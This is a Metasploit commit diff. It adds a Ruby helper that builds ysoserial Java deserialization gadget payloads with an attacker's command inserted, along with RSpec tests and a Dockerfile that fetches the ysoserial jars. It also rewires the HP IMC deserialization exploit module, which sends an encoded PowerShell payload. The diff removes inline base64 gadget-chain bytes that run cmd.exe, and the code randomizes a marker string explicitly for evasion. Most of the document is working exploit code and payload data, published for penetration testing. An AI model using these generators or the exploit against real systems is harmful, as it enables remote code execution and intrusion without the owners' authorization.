Land #11125, Import/generate ysoserial Java serialization objects

rapid7 · Jan 17, 2019 · 9256c6f · 9256c6f
1 parent 3109f65
commit 9256c6f
Show file tree

Hide file tree

Showing 8 changed files with 413 additions and 46 deletions.
diff --git a/data/ysoserial_payloads.json b/data/ysoserial_payloads.json
diff --git a/lib/msf/util.rb b/lib/msf/util.rb
@@ -22,3 +22,6 @@ module Util
 # Executable generation and encoding
 require 'msf/util/exe'
 require 'msf/util/helper'
+
+# Java deserialization payload generators
+require 'msf/util/java_deserialization'
diff --git a/lib/msf/util/java_deserialization.rb b/lib/msf/util/java_deserialization.rb
@@ -0,0 +1,66 @@
+module Msf
+module Util
+
+require 'json'
+
+# TODO:
+# Support ysoserial alongside ysoserial-modified payloads (including cmd, bash, powershell, none)
+
+class JavaDeserialization
+
+  PAYLOAD_FILENAME = "ysoserial_payloads.json"
+
+  def self.ysoserial_payload(payload_name, command=nil)
+    # Open the JSON file and parse it
+    begin
+      path = File.join(Msf::Config.data_directory, PAYLOAD_FILENAME)
+      json = JSON.parse(File.read(path))
+    rescue Errno::ENOENT, JSON::ParserError
+      raise RuntimeError, "Unable to load JSON data from 'data/#{PAYLOAD_FILENAME}'"
+    end
+
+    raise ArgumentError, "#{payload_name} payload not found in ysoserial payloads" if json[payload_name].nil?
+
+    # Extract the specified payload (status, lengthOffset, bufferOffset, bytes)
+    payload = json[payload_name]
+
+    # Based on the status, we'll raise an exception, return a static payload, or
+    # generate a dynamic payload with modifications at the specified offsets
+    case payload['status']
+    when 'unsupported'
+      # This exception will occur most commonly with complex payloads that require more than a string
+      raise ArgumentError, 'ysoserial payload is unsupported'
+    when 'static'
+      # TODO: Consider removing 'static' functionality, since ysoserial doesn't currently use it
+      return Rex::Text.decode_base64(payload['bytes'])
+    when 'dynamic'
+      raise ArgumentError, 'missing command parameter' if command.nil?
+
+      bytes = Rex::Text.decode_base64(payload['bytes'])
+
+      # Insert buffer
+      buffer_offset  = payload['bufferOffset'].first   #TODO: Do we ever need to support multiple buffers?
+      bytes[buffer_offset - 1] += command
+
+      # Overwrite length (multiple times, if necessary)
+      length_offsets = payload['lengthOffset']
+      length_offsets.each do |length_offset|
+        # Extract length as a 16-bit unsigned int, then add the length of the command string
+        length  = bytes[(length_offset-1)..length_offset].unpack('n').first
+        length += command.length.ord
+        length  = [length].pack("n")
+        bytes[(length_offset-1)..length_offset] = length
+      end
+
+      # Replace "ysoserial\/Pwner" timestamp string with randomness for evasion
+      bytes.gsub!(/ysoserial\/Pwner00000000000000/, Rex::Text.rand_text_alphanumeric(29))
+
+      return bytes
+    else 
+      raise RuntimeError, 'Malformed JSON file'
+    end
+  end
+end
+end
+end
+
diff --git a/modules/exploits/windows/http/hp_imc_java_deserialize.rb b/modules/exploits/windows/http/hp_imc_java_deserialize.rb
@@ -97,7 +97,8 @@ def check
   end
 
   def exploit
-    data = set_payload
+    cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
+    data = ::Msf::Util::JavaDeserialization.ysoserial_payload("JSON1",cmd)
 
     print_status "Sending serialized Java object (#{data.length} bytes)..."
     res = send_request_cgi({
@@ -106,49 +107,4 @@ def exploit
       'data'     => data
     })
   end
-
-  def set_payload
-    # JSON1 Serialized Stream start, middle and end, base64 encoded (from https://github.com/pimps/ysoserial-modified)
-    # Recreation steps:
-    #    wget https://github.com/pimps/ysoserial-modified/raw/master/target/ysoserial-modified.jar
-    #    java -jar ysoserial-modified.jar JSON1 cmd "" > jsonss
-    #     dd bs=1 if=jsonss of=jsonss_start skip=0 count=2645
-    #     dd bs=1 if=jsonss of=jsonss_mid skip=2647 count=1230
-    #     dd bs=1 if=jsonss of=jsonss_end skip=3879
-    #     for i in `ls jsonss_*`; do
-    #       cat $i | base64 -w0 > $i.b64
-    #       echo "$i=\"`cat $i.b64 `\""
-    #     done
-    # NOTE: The `jsonss_end` contains two randomized strings (eg. "ysoserial/Pwner141434911504672")
-
-    jsonss_start = Rex::Text.decode_base64 "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAIAAAACc3IALWphdmF4Lm1hbmFnZW1lbnQub3Blbm1iZWFuLlRhYnVsYXJEYXRhU3VwcG9ydE9iDqhrlxdDAgACTAAHZGF0YU1hcHQAD0xqYXZhL3V0aWwvTWFwO0wAC3RhYnVsYXJUeXBldAAoTGphdmF4L21hbmFnZW1lbnQvb3Blbm1iZWFuL1RhYnVsYXJUeXBlO3hwc3IAFm5ldC5zZi5qc29uLkpTT05PYmplY3S4ZY8caCRw+QIAAloACm51bGxPYmplY3RMAApwcm9wZXJ0aWVzcQB+AAN4cABzcQB+AAA/QAAAAAAADHcIAAAAEAAAAAF0AAF0c30AAAACAChqYXZheC5tYW5hZ2VtZW50Lm9wZW5tYmVhbi5Db21wb3NpdGVEYXRhAB1qYXZheC54bWwudHJhbnNmb3JtLlRlbXBsYXRlc3hyABdqYXZhLmxhbmcucmVmbGVjdC5Qcm94eeEn2iDMEEPLAgABTAABaHQAJUxqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uSGFuZGxlcjt4cHNyAEFjb20uc3VuLmNvcmJhLnNlLnNwaS5vcmJ1dGlsLnByb3h5LkNvbXBvc2l0ZUludm9jYXRpb25IYW5kbGVySW1wbD9wFnM9MqjPAgACTAAYY2xhc3NUb0ludm9jYXRpb25IYW5kbGVycQB+AANMAA5kZWZhdWx0SGFuZGxlcnEAfgAMeHBzcgAXamF2YS51dGlsLkxpbmtlZEhhc2hNYXA0wE5cEGzA+wIAAVoAC2FjY2Vzc09yZGVyeHEAfgAAP0AAAAAAAAx3CAAAABAAAAABdnIAKGphdmF4Lm1hbmFnZW1lbnQub3Blbm1iZWFuLkNvbXBvc2l0ZURhdGEAAAAAAAAAAAAAAHhwc3IAMnN1bi5yZWZsZWN0LmFubm90YXRpb24uQW5ub3RhdGlvbkludm9jYXRpb25IYW5kbGVyVcr1DxXLfqUCAAJMAAxtZW1iZXJWYWx1ZXNxAH4AA0wABHR5cGV0ABFMamF2YS9sYW5nL0NsYXNzO3hwc3EAfgAAP0AAAAAAAAx3CAAAABAAAAABdAAQZ2V0Q29tcG9zaXRlVHlwZXNyAChqYXZheC5tYW5hZ2VtZW50Lm9wZW5tYmVhbi5Db21wb3NpdGVUeXBltYdG61oHn0ICAAJMABFuYW1lVG9EZXNjcmlwdGlvbnQAE0xqYXZhL3V0aWwvVHJlZU1hcDtMAApuYW1lVG9UeXBlcQB+ABp4cgAjamF2YXgubWFuYWdlbWVudC5vcGVubWJlYW4uT3BlblR5cGWAZBqR6erePAIAA0wACWNsYXNzTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAC2Rlc2NyaXB0aW9ucQB+ABxMAAh0eXBlTmFtZXEAfgAceHB0AChqYXZheC5tYW5hZ2VtZW50Lm9wZW5tYmVhbi5Db21wb3NpdGVEYXRhdAABYnQAAWFzcgARamF2YS51dGlsLlRyZWVNYXAMwfY+LSVq5gMAAUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHBwdwQAAAABcQB+ACBxAH4AIHhzcQB+ACFwdwQAAAABcQB+ACBzcgAlamF2YXgubWFuYWdlbWVudC5vcGVubWJlYW4uU2ltcGxlVHlwZR6/T/jcZXgnAgAAeHEAfgAbdAARamF2YS5sYW5nLkludGVnZXJxAH4AJ3EAfgAneHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAAAAB4cHgAc3IANG9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLmZyYW1ld29yay5KZGtEeW5hbWljQW9wUHJveHlMxLRxDuuW/AIAA1oADWVxdWFsc0RlZmluZWRaAA9oYXNoQ29kZURlZmluZWRMAAdhZHZpc2VkdAAyTG9yZy9zcHJpbmdmcmFtZXdvcmsvYW9wL2ZyYW1ld29yay9BZHZpc2VkU3VwcG9ydDt4cAAAc3IAMG9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLmZyYW1ld29yay5BZHZpc2VkU3VwcG9ydCTLijz6pMV1AgAGWgALcHJlRmlsdGVyZWRbAAxhZHZpc29yQXJyYXl0ACJbTG9yZy9zcHJpbmdmcmFtZXdvcmsvYW9wL0Fkdmlzb3I7TAATYWR2aXNvckNoYWluRmFjdG9yeXQAN0xvcmcvc3ByaW5nZnJhbWV3b3JrL2FvcC9mcmFtZXdvcmsvQWR2aXNvckNoYWluRmFjdG9yeTtMAAhhZHZpc29yc3QAEExqYXZhL3V0aWwvTGlzdDtMAAppbnRlcmZhY2VzcQB+ADBMAAx0YXJnZXRTb3VyY2V0ACZMb3JnL3NwcmluZ2ZyYW1ld29yay9hb3AvVGFyZ2V0U291cmNlO3hyAC1vcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC5mcmFtZXdvcmsuUHJveHlDb25maWeLS/Pmp+D3bwIABVoAC2V4cG9zZVByb3h5WgAGZnJvemVuWgAGb3BhcXVlWgAIb3B0aW1pemVaABBwcm94eVRhcmdldENsYXNzeHAAAAAAAAB1cgAiW0xvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC5BZHZpc29yO9+DDa3SHoR0AgAAeHAAAAAAc3IAPG9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLmZyYW1ld29yay5EZWZhdWx0QWR2aXNvckNoYWluRmFjdG9yeVTdZDfiTnH3AgAAeHBzcgAUamF2YS51dGlsLkxpbmtlZExpc3QMKVNdSmCIIgMAAHhwdwQAAAAAeHNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAAAdwQAAAAAeHNyADRvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC50YXJnZXQuU2luZ2xldG9uVGFyZ2V0U291cmNlfVVu9cf4+roCAAFMAAZ0YXJnZXR0ABJMamF2YS9sYW5nL09iamVjdDt4cHNyADpjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UZW1wbGF0ZXNJbXBsCVdPwW6sqzMDAAZJAA1faW5kZW50TnVtYmVySQAOX3RyYW5zbGV0SW5kZXhbAApfYnl0ZWNvZGVzdAADW1tCWwAGX2NsYXNzdAASW0xqYXZhL2xhbmcvQ2xhc3M7TAAFX25hbWVxAH4AHEwAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAJ1cgACW0Ks8xf4BghU4AIAAHhwAAA="
-    jsonss_mid = Rex::Text.decode_base64 "yv66vgAAADMAPwoAAwAiBwA9BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAEGphdmEvbGFuZy9TdHJpbmcHADABAAdjbWQuZXhlCAAyAQACL2MIADQB"
-    jsonss_end = Rex::Text.decode_base64 "CAA2AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMADgAOQoAKwA6AQANU3RhY2tNYXBUYWJsZQEAHnlzb3NlcmlhbC9Qd25lcjE0MTQzNDkxMTUwNDY3MgEAIEx5c29zZXJpYWwvUHduZXIxNDE0MzQ5MTE1MDQ2NzI7ACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAAEAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAMAAOAAAADAABAAAABQAPAD4AAAABABMAFAACAAwAAAA/AAAAAwAAAAGxAAAAAgANAAAABgABAAAANQAOAAAAIAADAAAAAQAPAD4AAAAAAAEAFQAWAAEAAAABABcAGAACABkAAAAEAAEAGgABABMAGwACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAAOQAOAAAAKgAEAAAAAQAPAD4AAAAAAAEAFQAWAAEAAAABABwAHQACAAAAAQAeAB8AAwAZAAAABAABABoACAApAAsAAQAMAAAANQAGAAIAAAAgpwADAUy4AC8GvQAxWQMSM1NZBBI1U1kFEjdTtgA7V7EAAAABADwAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAl1cQB+AEYAAAHUyv66vgAAADMAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPQAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHhzcgAmamF2YXgubWFuYWdlbWVudC5vcGVubWJlYW4uVGFidWxhclR5cGVa9L2hxNYGPQIAAkwACmluZGV4TmFtZXNxAH4AMEwAB3Jvd1R5cGV0ACpMamF2YXgvbWFuYWdlbWVudC9vcGVubWJlYW4vQ29tcG9zaXRlVHlwZTt4cQB+ABt0ACZqYXZheC5tYW5hZ2VtZW50Lm9wZW5tYmVhbi5UYWJ1bGFyRGF0YXEAfgAfcQB+ACBzcgAmamF2YS51dGlsLkNvbGxlY3Rpb25zJFVubW9kaWZpYWJsZUxpc3T8DyUxteyOEAIAAUwABGxpc3RxAH4AMHhyACxqYXZhLnV0aWwuQ29sbGVjdGlvbnMkVW5tb2RpZmlhYmxlQ29sbGVjdGlvbhlCAIDLXvceAgABTAABY3QAFkxqYXZhL3V0aWwvQ29sbGVjdGlvbjt4cHNxAH4AOgAAAAF3BAAAAAFxAH4AIHhxAH4AUnEAfgAdcQB+AAVzcQB+AAJxAH4AB3EAfgBMcQB+AFN4"
-
-    # Generate Payload
-    cmd = gen_payload
-    tmp = 0x06d3 + cmd.length # Magic number plus length of the cmd
-    tmp = tmp.to_s(16)
-    length_param = [tmp.rjust(4,'0')].pack("H*")
-
-    # Convert command length to binary (two bytes, big-endian)
-    tmp = cmd.length.to_s(16)
-    cmd_size = [tmp.rjust(4,'0')].pack("H*")
-
-    # Some assembly required
-    serialized_data =  jsonss_start
-    serialized_data += length_param
-    serialized_data += jsonss_mid
-    serialized_data += cmd_size
-    serialized_data += cmd
-    serialized_data += jsonss_end
-
-    return serialized_data
-  end
-
-  def gen_payload
-    # Powershell payload
-    cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
-  end
-
 end
diff --git a/spec/lib/msf/util/java_deserialization_spec.rb b/spec/lib/msf/util/java_deserialization_spec.rb
@@ -0,0 +1,80 @@
+require 'rex'
+require 'msf/util/java_deserialization'
+
+RSpec.describe Msf::Util::JavaDeserialization do
+  let(:payload_name) do
+    'PAYLOAD_NAME'
+  end
+
+  let(:default_command) do
+    nil
+  end
+
+  describe '#ysoserial_payload' do
+    context 'when default payload name is changed' do
+      it 'raises a RuntimeError' do
+        payload_filename_constant = Msf::Util::JavaDeserialization.const_get(:PAYLOAD_FILENAME)
+        Msf::Util::JavaDeserialization.const_set(:PAYLOAD_FILENAME, 'INVALID')
+        expect{Msf::Util::JavaDeserialization::ysoserial_payload(payload_name, default_command)}.to raise_error(RuntimeError)
+        Msf::Util::JavaDeserialization.const_set(:PAYLOAD_FILENAME, payload_filename_constant)
+      end
+    end
+
+    context 'when default payload is not found' do
+      it 'raises a RuntimeError' do
+        allow(File).to receive(:join).and_return('INVALID')
+        expect{Msf::Util::JavaDeserialization::ysoserial_payload(payload_name, default_command)}.to raise_error(RuntimeError)
+      end
+    end
+
+    context 'when default payload is not JSON format' do
+      it 'raises a JSON::ParserError error' do
+        allow(File).to receive(:read).and_return('BAD DATA')
+        expect{Msf::Util::JavaDeserialization::ysoserial_payload(payload_name, default_command)}.to raise_error(JSON::ParserError)
+      end
+    end
+
+    context 'when payload status is unsupported' do
+      it 'raises a unsupported error' do
+        json_data = %Q|{"BeanShell1":{"status":"unsupported","bytes":"AAAA"}}|
+        allow(File).to receive(:read).and_return(json_data)
+        expect{Msf::Util::JavaDeserialization::ysoserial_payload(payload_name, default_command)}.to raise_error(ArgumentError)
+      end
+    end
+
+    context 'when payload status is static' do
+      let(:payload_name) do
+        'BeanShell1'
+      end
+
+      it 'returns a Base64 string' do
+        original_bytes = 'AAAA'
+        b64 = Rex::Text.encode_base64(original_bytes)
+        json_data = %Q|{"BeanShell1":{"status":"static","bytes":"#{b64}"}}|
+        allow(File).to receive(:read).and_return(json_data)
+        p = Msf::Util::JavaDeserialization::ysoserial_payload(payload_name, default_command)
+        expect(p).to eq(original_bytes)
+      end
+    end
+
+    context 'when payload status is dynamic' do
+      let(:payload_name) do
+        'BeanShell1'
+      end
+
+      context 'when missing a command' do
+        it 'raises an argument error' do
+          expect{Msf::Util::JavaDeserialization::ysoserial_payload(payload_name, default_command)}.to raise_error(ArgumentError)
+        end
+      end
+
+      context 'when a command is provided' do
+        it 'returns serialized data' do
+          default_command = 'id'
+          p = Msf::Util::JavaDeserialization::ysoserial_payload(payload_name, default_command)
+          expect(p).to include('java.awt.event')
+        end
+      end
+    end
+  end
+end
diff --git a/tools/payloads/ysoserial/Dockerfile b/tools/payloads/ysoserial/Dockerfile
@@ -0,0 +1,32 @@
+# A docker container to generate empty ysoserial payloads and metadata to allow for
+# dynamically creating payloads within related projects, such as Metasploit
+#
+#   Created by:  Aaron Soto, Rapid7 Metasploit Team, 2018-DEC-11
+#
+# To run:
+#   docker build -t ysoserial-payloads . && docker run -i ysoserial-payloads > ysoserial_offsets.json
+#
+# Note: There will be ruby gem errors.  It's fine.
+#       We attempt to use the ysoserial-modified fork, then fail back to the original ysoserial project.
+#       You will see warnings, but we're doing our best.  :-)
+
+FROM ubuntu
+
+RUN apt update && apt -y upgrade
+# Dependencies: wget (to download ysoserial)
+#               openjdk-8-jre-headless (to execute ysoserial)
+#               make, gcc (to install the 'json' ruby gem)
+RUN apt install -y wget openjdk-8-jre-headless ruby-dev make gcc
+
+# Download the latest ysoserial-modified
+RUN wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial-original.jar
+RUN wget -q https://github.com/pimps/ysoserial-modified/raw/master/target/ysoserial-modified.jar
+
+# Install gems: diff-lcs (to diff the ysoserial output)
+#               json (to print the scripts results in JSON)
+#               pry (to debug issues)
+RUN gem install --silent diff-lcs json pry
+
+COPY find_ysoserial_offsets.rb /
+
+CMD ruby /find_ysoserial_offsets.rb